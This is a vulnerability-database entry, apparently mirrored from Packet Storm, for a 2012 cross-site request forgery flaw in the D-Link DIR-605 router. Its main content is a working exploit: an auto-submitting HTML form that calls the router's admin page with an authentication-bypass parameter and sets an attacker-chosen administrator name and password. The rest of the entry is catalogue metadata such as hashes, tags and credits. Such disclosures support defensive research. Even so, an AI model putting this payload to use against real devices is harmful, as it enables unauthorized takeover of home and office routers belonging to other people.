Sign-up

ID

VAR-E-201203-0334


TITLE

D-Link DIR-605 Cross Site Request Forgery

Trust: 0.5

sources: PACKETSTORM: 111074

DESCRIPTION

D-Link DIR-605 suffers from a cross site request forgery vulnerability.

Trust: 0.5

sources: PACKETSTORM: 111074

AFFECTED PRODUCTS

vendor:d linkmodel:dir-605scope: - version: -

Trust: 0.5

sources: PACKETSTORM: 111074

EXPLOIT

# Exploit Title: D-Link DIR-605 CSRF Vulnerability
# Date: 20-03-2012
# Author: iqzer0++
# Version: Firmware Version : 2.00
# Tested on: DIR-605
This allows unauthroized access to the device and post injections
<html>
<form name="bypass" action="
http://xxx.xxx.xxx.xxx/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0"
method="post">
<input type="hidden" name="ACTION_POST" value="1" />
<input type="hidden" name="admin_name" value="iqzer0" />
<input type="hidden" name="admin_password1" value="bypass" />
<input type="hidden" name="admin_password2" value="bypass" />
</form>
<script>document.bypass.submit();</script>
</html>

Trust: 0.5

sources: PACKETSTORM: 111074

EXPLOIT HASH

LOCAL

SOURCE

md5: 1eb3f64580b26930e4ecbee6d27348d4
sha-1: 8528ff1bf71a259c0ceefbfa1a0467f31e659747
sha-256: 49ad72730d1c661c71c25148ddc1769f2f703b29cc07714c979a0c50eebdb566
md5: 1eb3f64580b26930e4ecbee6d27348d4

Trust: 0.5

sources: PACKETSTORM: 111074

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 111074

TYPE

csrf

Trust: 0.5

sources: PACKETSTORM: 111074

TAGS

tag:exploit

Trust: 0.5

tag:csrf

Trust: 0.5

sources: PACKETSTORM: 111074

CREDITS

iqzer0

Trust: 0.5

sources: PACKETSTORM: 111074

EXTERNAL IDS

db:PACKETSTORMid:111074

Trust: 0.5

sources: PACKETSTORM: 111074

SOURCES

db:PACKETSTORMid:111074

LAST UPDATE DATE

2022-07-27T09:59:02.390000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:111074date:2012-03-21T19:11:11